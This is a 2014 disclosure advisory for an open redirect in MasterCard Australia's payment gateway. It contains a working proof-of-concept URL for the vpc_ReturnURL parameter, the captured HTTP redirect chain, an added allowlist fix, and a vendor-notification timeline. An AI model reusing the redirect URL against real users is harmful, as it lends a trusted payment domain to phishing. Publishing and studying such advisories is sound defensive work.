
MasterCard Open Redirect

Posted Jul 28, 2014
Authored by Anastasios Monachos

MasterCard.com.au suffers from an open redirect vulnerability.

tags | exploit
SHA-256 | 17091aa154924d37cfd73e3daf265786342f19af4f9ee46ad81527ff34d612aa

=======================================================================
MasterCard - Open Redirect
=======================================================================

Affected Domain : mastercard.com.au
Local/Remote : Remote
Severity : Very Low
Vulnerable URL : https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://<any_domain>
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]

[Summary]

Input passed via the vpc_ReturnURL parameter to vpcpay is not properly verified before being used in a redirect. This can be exploited to redirect a user to an arbitrary website, e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

[Vulnerability Details]

GET Request:
------------
GET https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://www.google.com HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET Response:
-------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:26:51 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Set-Cookie: PAY4939831625825013779=PAY8CA6985107791A1B572838CBB73CF5D3; Path=/; Secure
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:56:51 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

Follow up GET Request I:
------------------------
GET https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response I:
-------------------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:27:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:57:10 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: http://www.google.com?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

GET follow up Request II:
-------------------------
GET http://www.google.com/?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response II:
--------------------------
HTTP/1.1 302 Found
Location: http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 May 2014 12:27:41 GMT
Server: gws
Content-Length: 258
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg">here</A>.
</BODY></HTML>
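
A server-side check that would stop the redirect shown in the exchange above, as an added example that is not part of the original advisory and not MasterCard's code: vpc_ReturnURL is honoured only when its origin is registered for the merchant, and a request without a known vpc_Merchant gets a local error instead of a 302. The merchant ID, the registered origin and the function names are assumptions made for illustration.

```python
from urllib.parse import urlsplit, urlencode

# Constructed sample data: merchant ID -> registered return origins (hypothetical).
REGISTERED_RETURN_ORIGINS = {
    "TESTMERCHANT01": {("https", "shop.example.com", 443)},
}
DEFAULT_PORTS = {"https": 443, "http": 80}


def validated_return_url(merchant_id, return_url):
    """Return return_url if its origin is registered for merchant_id, else None."""
    allowed = REGISTERED_RETURN_ORIGINS.get(merchant_id or "")
    if not allowed or not return_url:
        return None
    # Reject characters that browsers and parsers normalise differently.
    if any(c == "\\" or c.isspace() or ord(c) < 0x20 for c in return_url):
        return None
    try:
        parts = urlsplit(return_url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    # Userinfo ("user@host") makes the real host easy to misread; refuse it.
    if parts.username is not None or parts.password is not None:
        return None
    if port is None:
        port = DEFAULT_PORTS.get(parts.scheme)
    # Exact origin match: no prefix, suffix or substring comparison.
    origin = (parts.scheme, parts.hostname or "", port)
    return return_url if origin in allowed else None


def build_response(params):
    """Return (status, location) for an error result such as response code 7."""
    target = validated_return_url(params.get("vpc_Merchant"),
                                  params.get("vpc_ReturnURL"))
    if target is None:
        # No trusted destination: render the error locally, never redirect off-site.
        return 400, None
    result = urlencode({"vpc_TxnResponseCode": "7", "vpc_TransactionNo": "0"})
    sep = "&" if urlsplit(target).query else "?"
    return 302, f"{target}{sep}{result}"


if __name__ == "__main__":
    # The advisory's request: no vpc_Merchant, arbitrary return URL.
    print(build_response({"vpc_ReturnURL": "http://www.google.com"}))
    print(build_response({"vpc_Merchant": "TESTMERCHANT01",
                          "vpc_ReturnURL": "https://shop.example.com/receipt"}))
```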


[Time-line]

23/06/2014 - Advisory created
23/06/2014 - Mastercard notified: no response
25/06/2014 - Vendor contacted again - different department: no response
08/07/2014 - Re-contacted both departments: no response
27/07/2014 - Advisory published